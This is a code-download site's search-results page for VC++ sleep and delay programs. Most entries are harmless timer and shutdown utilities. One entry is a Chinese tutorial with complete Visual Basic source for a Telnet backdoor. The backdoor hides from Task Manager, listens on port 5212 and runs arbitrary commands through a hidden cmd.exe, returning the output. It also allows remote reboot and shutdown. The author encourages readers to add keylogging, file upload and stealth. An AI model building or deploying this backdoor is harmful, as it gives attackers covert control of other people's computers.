Welcome![Sign In][Sign Up]
Location:
Search - vc sleep

Search list

[Other resourcedelay

Description: VC++环境下的延时程序。sleep函数,还有delay函数。
Platform: | Size: 3279 | Author: linglingma | Hits:

[Network DevelopVB Telnet编程指导思路

Description:

vB编程之TELNET
对于TELNET后门的编写我们可通过VC来编写,网上也有很多的关于用VC编写TELNET后门的源码。但是看X档案的一定不少是喜欢VB来编写程序的。纵然编写TELNET后门不是VB的长项,但这不并难实现。偶没见网上有用VB编写TELNET后门的文章,所以我就写下了此文,确切的说,
这不是个真正后门,只是一个后门的基本模型,甚至可以说毛坯。BUG的修改,不足的修补,功能的扩充还需读者动手来实现。
首先,我们在大脑里想象出一个后门运行的过程或者把其大概的流程画出来,然后就按这个过程逐步来实现。好了,
下面就开始我们的后门编写之路。首先就是当程序运行时防止再一个程序的运行,实现代码如下:
Private Sub Form_Load()
syspath = systempath()
'防止多个程序运行
If App.PrevInstance Then
End
End If
cmdno = True
'使程序不在任务管理器中显示
App.TaskVisible = False
'监听端口5212
Winsock1.LocalPort = 5212
Winsock1.Listen
End Sub
其次,当telnet端请求连接时,服务端接受请求。(大家可以在此试着实现密码验证机制的实现,很简单,在此不再给出代码)
当TELNET连接时,触发ConnectionRequest事件,在这个事件中向控制端发送相应的成功连接和帮助信息。
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then
Winsock1.Close
Winsock1.Accept requestID
Winsock1.SendData "------------------------backdoor v1.0-------------------------" & vbCrLf & _
Space(16) & "code by eighteen" & vbCrLf & "-------------------------------------------------------------" & _
vbCrLf & "type help to get help" & vbCrLf & "shell>"
End If
End Sub
当我们连接上时,就需要对TELNET发来的命令进行一系列的处理和执行,以及执行相关的控制功能。
其中的问题是服务端接受来自TELNET客户端的连接和命令,由于TELNET传输命令时只能每间次传输一个字符的特殊性,
所以我们需要编写一个处理命令的过程,这个不难实现。还有就是对特殊字符的过滤和处理,如TELNET输入错误按DEL键,
按ENTER键来完成一条命令的输入。当TELNET连上服务端时,实现shell功能,以及shell功能和其它功能的分离。
对其中的问题有了大概的了解,那实现起来也就不难了。代码如下:
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim str1 As String
Dim scmd As String
Dim i As Integer
Dim tag As Integer
Winsock1.GetData str1
'过滤del键盘,用来telnet命令输入错误处理.如果输入del键盘,则当前命令无效
If Asc(str1) = 8 Then
myname = "" '清空命令存储
Winsock1.SendData vbCrLf & "shell>"
End If
'检察当前一个命令的完整性和对命令输入错误的处理
If (Asc(str1) <> 13) And (Asc(str1) <> 8) Then
myname = myname + str1
Elseif Asc(str1) <> 8 Then
'测试时,查看接受的命令
Text1.Text = myname & vbcrlf
myname = "" '清空对当前命令的存储,用来接受下一条命令
'--------下面是对接受命令的处理
tag = InStr(Text1.Text, Chr(13)) - 1
scmd = Left(Text1.Text, tag)
'------------------------------
'判断是不是在虚拟shell中,不是则执行如下命令,否则执行虚拟shell命令语句
If cmdno = True Then
Select Case scmd
Case "help"
Winsock1.SendData "cmd     -------打开shell" & vbCrLf & "reboot     -------重启" & _
vbCrLf & "shutdown   ------- 关机" & vbCrLf & "exit     -------退出" & vbCrLf & "shell>"

Case "reboot"
ExitWindowsEx EXW_REBOOT, 0

Case "shutdown"
ExitWindowsEx EXW_SHUTDOWN, 0
Case "exit"
Winsock1.SendData "exit seccessful!"
Winsock1.Close
Winsock1.Listen
Case "cmd"
Winsock1.SendData "获得虚拟shell成功!" & vbCrLf & "vcmd>"
cmdno = False
Case Else
Winsock1.SendData "cammond error!" & vbCrLf & "shell>"
End Select
Else
Shell "cmd.exe /c" & Space(1) & scmd & Space(1) & ">" & syspath & "\shell.rlt&exit", vbHide
Sleep (500)
'调用执行结果发送过程
Call tranrlt
Winsock1.SendData "如果想退出虚拟shell,清输入exit" & vbCrLf & "vcmd>"
If scmd = "exit" Then
Winsock1.SendData "成功退出虚拟shell!" & vbCrLf & "shell>"
cmdno = True '重置虚拟shell标志
End If
End If
End If
End Sub
接下来要考滤的是,虚拟shell的实现,我用了一个简单的方法,就是把命令执行结果写入一个文本文档,然后读取其中的内
容并将结果发送给控制端。代码如下:
Sub tranrlt()
Dim strrlt As String
Open syspath & "\shell.rlt" For Input As #1
Do While Not EOF(1)
Line Input #1, strrlt
Winsock1.SendData strrlt & vbCrLf
Loop
Close #1
Winsock1.SendData "----------------------------------------------------" & vbCrLf
Shell "cmd.exe /c del " & syspath & "\shell.rlt&exit", vbHide
End Sub
至此,后门的主要问题都解决了,也许有的读者可以看出,这个后门模型存在问题。的确,这个后门模型并不完整,
所谓学而三思,思而后行,剩下的问题读者可以试着去解决。在此我不在给出源码。提示一下:
(1)如果TELNET不正常退出,服务端还会继续保存当前的会话,重新连接后失败。还有就是如何可以允许多人同时连接功能。
(2)读者可以加上密码验证机制,在此基础上扩大它的控制功能,如键盘记录,文件上传等。
(3)一个成功的后门,必然有一个好的隐藏和自我保护机制,所以,大家需要努力发挥自己的聪明和才智了。
以上只是个人愚见,不难实现。其实程序编写只有深入其中,动手实践,才会发现各种问题,而正是在这发现问题,解决问题的过程中,
你会学到更多,成功后的满足也更多。当我们苦苦思索解决一个问题或实现一种新方法和功能时,那种豁然开朗,
成功的喜悦会让你体会编程的乐趣。希望大家看完本文和在动手来完善它的时候,能学到些知识和技巧,那本文的目的也就达到了。

_____________--源码
Public syspath As String
Public cmdno As Boolean
Private Declare Sub Sleep Lib "kernel32" (ByVal nsecond As Long)
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Const EWX_REBOOT = 2
Const EWX_SHUTDOW = 1
Public myname As String
Sub tranrlt()
Dim strrlt As String
Open syspath & "\shell.rlt" For Input As #1
Do While Not EOF(1)
Line Input #1, strrlt
Winsock1.SendData strrlt & vbCrLf
Loop
Close #1
Winsock1.SendData "----------------------------------------------------" & vbCrLf
Shell "cmd.exe /c del " & syspath & "\shell.rlt&exit", vbHide
End Sub
Function systempath() As String
Dim filepath As String
Dim nSize As Long
filepath = String(255, 0)
nSize = GetSystemDirectory(filepath, 256)
filepath = Left(filepath, nSize)
systempath = filepath
End Function
Private Sub Form_Load()
syspath = systempath()
If App.PrevInstance Then
End
End If
cmdno = True
App.TaskVisible = False
Winsock1.LocalPort = 5212
Winsock1.Listen
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then
Winsock1.Close
Winsock1.Accept requestID
Winsock1.SendData "------------------------backdoor v1.0-------------------------" & vbCrLf & _
Space(16) & "code by eighteen" & vbCrLf & "-------------------------------------------------------------" & _
vbCrLf & "type help to get help" & vbCrLf & "shell>"
End If
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim str1 As String
Dim scmd As String
Dim i As Integer
Dim tag As Integer
Winsock1.GetData str1
If Asc(str1) = 8 Then
myname = ""
Winsock1.SendData vbCrLf & "command error!" & vbCrLf & "shell>"
End If
If (Asc(str1) <> 13) And (Asc(str1) <> 8) Then
myname = myname + str1
ElseIf Asc(str1) <> 8 Then
Text1.Text = myname & vbCrLf
myname = ""
tag = InStr(Text1.Text, Chr(13)) - 1
scmd = Left(Text1.Text, tag)
If cmdno = True Then
Select Case scmd
Case "help"
Winsock1.SendData "cmd     -------打开shell" & vbCrLf & "reboot     -------重启" & _
vbCrLf & "shutdown   ------- 关机" & vbCrLf & "exit     -------退出" & vbCrLf & "shell>"

Case "reboot"
ExitWindowsEx EXW_REBOOT, 0

Case "shutdown"
ExitWindowsEx EXW_SHUTDOWN, 0
Case "exit"
Winsock1.SendData "exit seccessful!"
Winsock1.Close
Winsock1.Listen
Case "cmd"
Winsock1.SendData "获得虚拟shell成功!" & vbCrLf & "vcmd>"
cmdno = False
Case Else
Winsock1.SendData "command error!" & vbCrLf & "shell>"
End Select
Else
Shell "cmd.exe /c" & Space(1) & scmd & Space(1) & ">" & syspath & "\shell.rlt&exit", vbHide
Sleep (500)
Call tranrlt

Winsock1.SendData "如果想退出虚拟shell,清输入exit" & vbCrLf & "vcmd>"
If scmd = "exit" Then
Winsock1.SendData "成功退出虚拟shell!" & vbCrLf & "shell>"
cmdno = True
End If
End If
End If
End Sub

Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
Winsock1.Close
Winsock1.Listen
End Sub


Platform: | Size: 8205 | Author: onetwogoo | Hits:

[Other Riddle gamesguitusaipao

Description: 编写一个程序生成两个线程(进程)模拟龟兔赛跑。 1、兔子进程优先级高,因而跑的快,但兔子进程随机发生一些睡眠。 2、乌龟进程优先级低,因而跑的慢,但乌龟进程不发生睡眠。 3、程序应能用动画方式显示龟兔赛跑的进程。 源程序如下:(我在vc6.0调试通过)-procedures for the preparation of a generation two threads (processes) simulation hand. 1, rabbits process high priority and thus run faster, but the rabbit random process some sleep. 2, turtles low-priority process, which run slowly, but the process does not occur turtles sleep. 3, procedures should be spent shown the race between animation process. Source : (I vc6.0 through debugging)
Platform: | Size: 1024 | Author: | Hits:

[OtherShutdownComputer

Description: 一个用VC++实现的一个在Windows 2k下的通过软件实现关机的程序。 通过参考此程序可以很好得实现 通过休眠功能的硬关机操作。-A used VC++ Achieved under a Windows2k through software shutdown procedures. By a reference to this procedure can get very good sleep function to achieve through hard shutdown operation.
Platform: | Size: 33792 | Author: fullball | Hits:

[File Formatdiblook

Description: opengl 编程环境设置,详细的减少了如何在VC下进行OPENGL的设置-opengl met furthest away from the chirpy alas, agate牉cavity left屾Endure VC ? sleep Now your vehicles clean from shallow cavity OPENGL
Platform: | Size: 333824 | Author: zhang | Hits:

[SCMdelay

Description: VC++环境下的延时程序。sleep函数,还有delay函数。-VC++ Environment delay procedures. sleep function, as well as delay function.
Platform: | Size: 348160 | Author: linglingma | Hits:

[Othersupershut1.5

Description: 一个简单的VC++6.0定时关机程序,可以选择 关机 休眠,可以定时,会显示现在时间和剩余时间,在最后一分钟会跳出,打开程序时会自动隐藏到系统托盘。另外,本人是新手,所以加了N多注释。你打开看就知道了,注释都快比代码多了。 -A simple VC++6.0 regular shutdown procedure, you can choose off to sleep, may be from time to time, will show the time and the remaining time will jump out at the last minute to open the program will automatically hide the system tray. In addition, I am a novice, so more than N addition of annotations. You open to see that, and comments faster than the code more.
Platform: | Size: 5282816 | Author: suyanhua | Hits:

[CommunicationVCSetTimer

Description: 通过介绍SetTimer函数,来计算通信延时。在VC下得到精确延时时间,而sleep函数是完成不了的-By introducing the SetTimer function to calculate the communication time delay. In the next VC to be accurate delay time, and can not sleep function is to complete
Platform: | Size: 1024 | Author: wukong | Hits:

[Process-ThreadCEvent

Description: VC++使用CEvent类编程创建线程:声明线程函数、定义全局变量m_Sec、定义线程句柄、创建线程1和2、关闭线程句柄对象、程序睡眠10秒、输出变量、设置事件对象为有信号状态、跳出循环等。-VC++ programming to create threads using CEvent class: Statement thread function, which defines global variables m_Sec, the definition of the thread handle, create thread 1 and 2, close the thread handle objects, the program sleep for 10 seconds, output variables, set the event object to signaled state, out of circulation.
Platform: | Size: 5120 | Author: squallyang | Hits:

[Windows Developsendsms

Description: VC++使用CEvent类编程创建线程:声明线程函数、定义全局变量m_Sec、定义线程句柄、创建线程1和2、关闭线程句柄对象、程序睡眠10秒、输出变量、设置事件对象为有信号状态、跳出循环等。-VC++ programming to create threads using CEvent class: Statement thread function, which defines global variables m_Sec, the definition of the thread handle, create thread 1 and 2, close the thread handle objects, the program sleep for 10 seconds, output variables, set the event object to signaled state, out of circulation.
Platform: | Size: 60416 | Author: squallyang | Hits:

[OS programPowerStateShut

Description: vc 实现休眠计算机,并创建快捷键\PowerStateShut的源码-vc achieve sleep the computer, and create a shortcut \ PowerStateShut source
Platform: | Size: 27648 | Author: 郑建光 | Hits:

[OS programPowerStateShut

Description: vc——实现休眠计算机,并创建快捷键\PowerStateShut的程序源码,值得一看!-vc- to achieve sleep the computer, and create a shortcut \ PowerStateShut the program source code, worth a visit!
Platform: | Size: 28672 | Author: 黄金民 | Hits:

[OS programPowerStateShut

Description: 实现休眠计算机,并创建快捷键\PowerStateShut\PowerStateShut.rar,很不错的vc源码,希望对大家有所帮助。-Achieve sleep the computer, and create a shortcut \ PowerStateShut \ PowerStateShut.rar, very good vc source, we want to help.
Platform: | Size: 28672 | Author: 程松发 | Hits:

[OtherTimeExit

Description: VC++定时关机、重启程序,还可实现定时注销,点击隐藏后可通过快捷键Ctrl+Alt+G返回前台。在编辑框中输入分钟数,按下定时按钮即可实现定时关机。是本站一款定时关机程序的修改版,分享与大家学习。-VC++ regular shutdown, restart the program, but also to achieve timing canceled click hidden by shortcut Ctrl+ Alt+ G to return to the front desk. Press the timer button in the edit box, enter the number of minutes, you can achieve regular shutdown. A modified version of a sleep timer are the program, learning to share with you.
Platform: | Size: 28672 | Author: 林海波 | Hits:

[Windows DevelopTimeExit

Description: VC++定时关机、重启程序,还可实现定时注销,点击隐藏后可通过快捷键Ctrl+Alt+G返回前台。在编辑框中输入分钟数,按下定时按钮即可实现定时关机。是本站一款定时关机程序的修改版,分享与大家学习。-VC++ regular shutdown, restart the program, but also the timing canceled, click hidden by shortcuts Ctrl+Alt+G returns the foreground. Press the timer button in the edit box, enter the number of minutes, you can achieve regular shutdown. A modified version of a sleep timer are the program, learning to share with you.
Platform: | Size: 28672 | Author: 古沙 | Hits:

[OtherGuanji

Description: vc编写的实现简单定时关机,重启,注销,使用OnTimer-Simple sleep timer
Platform: | Size: 372736 | Author: | Hits:

[Windows DevelopTimer

Description: 用VC++开发的定时器.主要功能:倒计时,定时关机,休眠,闹钟等.-VC++ developers with a timer function: countdown, timer, sleep, alarm clock and so on.
Platform: | Size: 13016064 | Author: 同报国 | Hits:

[Consolepwc

Description: 使用C++开发,实现机算计定时开关机和休眠,如果使用VC++控制台编译,文件会比G++小很多-timing shutdown and sleep
Platform: | Size: 1024 | Author: 黑夜童话 | Hits:

[Software EngineeringVC-delay-in-the-use

Description: VC++七种延时方式:VC中的WM_TIMER消息映射能进行简单的时间控制 VC中使用sleep()函数实现延时 利用COleDateTime类和COleDateTimeSpan类结合WINDOWS的消息处理过程来实现秒级延时 -VC delay in the use of sleep () function the use of COleDateTime class and COleDateTimeSpan class combined with WINDOWS message processing to achieve the second-class time delay VC++,
Platform: | Size: 5120 | Author: Winne King | Hits:

[Windows Develop休眠

Description: 休眠,在广义上包括挂起到内存(STR,也就是待机)和挂起到硬盘(Suspend to Disk,简称STD)两种,而我们通常所指的休眠其实是STD。用VC代码实现的。(Sleep, in broad sense, includes two kinds of STD, Disk and Suspend to (STR), and what we usually refer to as sleep is actually STD. Implemented with VC code.)
Platform: | Size: 6653952 | Author: yhy_wlkj | Hits:

CodeBus www.codebus.net